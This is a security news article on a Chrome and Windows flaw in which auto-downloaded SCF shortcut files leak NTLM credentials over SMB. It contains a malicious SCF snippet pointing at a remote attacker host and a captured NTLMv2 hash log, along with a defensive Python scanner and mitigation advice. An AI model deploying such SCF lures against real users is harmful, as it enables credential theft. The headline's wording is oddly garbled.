
Beware! Hackers Tin Pocket Your Windows Password Remotely Using Chrome

A security researcher has discovered a serious vulnerability in the default configuration of the latest version of Google's Chrome running on any version of Microsoft's Windows operating system, including Windows 10, that could allow remote hackers to steal a user's login credentials.

Researcher Bosko Stankovic of DefenseCode has found that merely visiting a website containing a malicious SCF file could cause victims to unknowingly share their computer's login credentials with hackers via Chrome and the SMB protocol.

This technique is not new: it was exploited by Stuxnet, a powerful malware especially designed to destroy Iran's nuclear program, which used Windows shortcut (LNK) files to compromise systems.

What makes this attack different from others is the fact that such SMB authentication related attacks have been publicly demonstrated on Google Chrome for the first time, after Internet Explorer (IE) and Edge.

Chrome + SCF + SMB = Stealing Windows Credentials


The SCF (Shell Command File) shortcut file format works similarly to LNK files and is designed to support a limited set of Windows Explorer commands that help define an icon on your desktop, such as My Computer and Recycle Bin.

"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim's authentication credentials," Stankovic wrote in a blog post describing the flaw.

Basically, shortcut links on your desktop are text files with a specific syntax of shell code that defines the location of the icon/thumbnail, the application's name and its location:
[Shell]
Command=2
IconFile=explorer.exe,3
Since Chrome trusts Windows SCF files, attackers can trick victims into visiting a website containing a maliciously crafted shortcut file, which gets downloaded automatically onto the target system without prompting the user for confirmation.

As soon as the user opens the folder containing that downloaded file, immediately or later, the file is automatically processed to retrieve its icon, without the user having to click on it.

But instead of pointing at an icon image, the malicious SCF file created by the attacker contains the location of a remote SMB server (controlled by the attacker):
[Shell]
IconFile=\\170.170.170.170\icon
So, as soon as the SCF file attempts to retrieve the icon image, Windows is tricked into authenticating automatically to the attacker-controlled remote server over the SMB protocol, handing over the victim's username and a hashed version of the password, which allows the attacker to use those credentials to authenticate to the victim's personal computer or network resources.

"Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares," Stankovic said.

But following the Stuxnet attacks, Microsoft forced LNK files to load their icons only from local resources, so they would no longer be vulnerable to such attacks, which made them load malicious content from outside servers.

However, SCF files were left alone.
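
As an added illustration (not code from this article or from DefenseCode), the following Python script parses SCF files the way a download-folder check might and flags those whose IconFile entry is a UNC path to a remote share, which is exactly the form that triggers the automatic SMB authentication described above; it also reports the extensionless name that Windows Explorer would display. The two sample files and the 170.170.170.170 address are constructed from the examples on this page.

```python
import re
import tempfile
from pathlib import Path

# Constructed samples mirroring the two shortcut forms shown above (not the researcher's PoC).
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
MALICIOUS_SCF = "[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n"
# A UNC path (\\host\share or //host/share) names a remote SMB server and so triggers
# automatic NTLM authentication; bare paths such as explorer.exe,3 resolve locally.
UNC_PATTERN = re.compile(r"^(\\\\|//)[^\\/]+")

def parse_scf(text: str) -> dict:
    """Return the key=value pairs of the [Shell] section, with lower-cased keys."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "shell" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values

def icon_is_remote(text: str) -> bool:
    """True when IconFile points at a UNC path, i.e. an SMB share rather than a local file."""
    return bool(UNC_PATTERN.match(parse_scf(text).get("iconfile", "")))

def displayed_name(filename: str) -> str:
    """Name as Explorer shows it: the .scf suffix is hidden, so picture.jpg.scf appears as picture.jpg."""
    return filename[:-4] if filename.lower().endswith(".scf") else filename

def scan_directory(directory: Path) -> list:
    """(real name, displayed name, IconFile) for each .scf file whose icon is on a remote share."""
    findings = []
    for path in sorted(p for p in directory.iterdir() if p.suffix.lower() == ".scf"):
        shell = parse_scf(path.read_text(encoding="utf-8", errors="replace"))
        if UNC_PATTERN.match(shell.get("iconfile", "")):
            findings.append((path.name, displayed_name(path.name), shell["iconfile"]))
    return findings

def demo() -> list:
    """Drop the two constructed samples into a scratch folder (standing in for Downloads) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "readme.scf").write_text(BENIGN_SCF)
        (folder / "picture.jpg.scf").write_text(MALICIOUS_SCF)
        return scan_directory(folder)
```

Pointing scan_directory at a real Downloads folder lists any SCF file that would reach out to a remote share the moment the folder is opened.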

Exploiting LM/NTLM Hash Authentication via SCF File

Image Source: SANS
But why would your Windows PC automatically hand over your credentials to the server?

If you are unaware, this is how authentication via the Server Message Block (SMB) protocol works in combination with the NTLM challenge/response authentication mechanism.

In short, LM/NTLM authentication works in four steps:
  • A Windows user (client) attempts to log into a server.
  • The server responds with a challenge value, asking the client to encrypt the challenge value with its password hash and send it back.
  • Windows handles the SCF request by sending the client's username and the hashed version of the password to the server.
  • The server then captures that response and approves authentication if the client's password hash is correct.
Now, in the SCF attack scenario elaborated by Stankovic, Windows will try to authenticate to the malicious SMB server automatically by providing the victim's username and NTLMv2 password hash (for a personal computer or network resource) to the server, as described in step 3 above.

If the user is part of a corporate network, the network credentials assigned to the user by the company's sysadmin will be sent to the attacker.

If the victim is a home user, the victim's Windows username and password hash will be sent to the attacker:
[*] SMB Captured - 2017-05-15 13:10:44 +0200
NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182
USER:Bosko DOMAIN:Master OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:98daf39c3a253bbe4a289e7a746d4b24
NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000
00000000000
Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000
No doubt, the credentials are hashed rather than sent in the clear, but they can be "brute-forced" later to recover the original login password in plain text.

"It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings," the researcher said. "Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files."

No Need to Decrypt Password *Sometimes*


Since a number of Microsoft services accept the password in its hashed form, the attacker can even use the hashed password to log in to your OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and other Microsoft services, making the cracking step unnecessary.

Such vulnerabilities, according to the researcher, could also pose a serious threat to large organizations, as they enable attackers to impersonate one of their members, immediately reuse the gained privileges to escalate access further, gain access to and control of their IT resources, and perform attacks on other members.

How to Prevent Such SMB Authentication-related Attacks


Simply block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewalls, so that local computers cannot query remote SMB servers.

Stankovic also advises users to consider disabling automatic downloads in Google Chrome by going to Settings → Show advanced settings → and then checking the "Ask where to save each file before downloading" option.

This change will allow you to manually approve each download attempt, which would significantly decrease the risk of credential theft attacks using SCF files.

Google is aware of the vulnerability and is said to be working on a patch, but no timeframe has been given as to when the patch will be made available to users.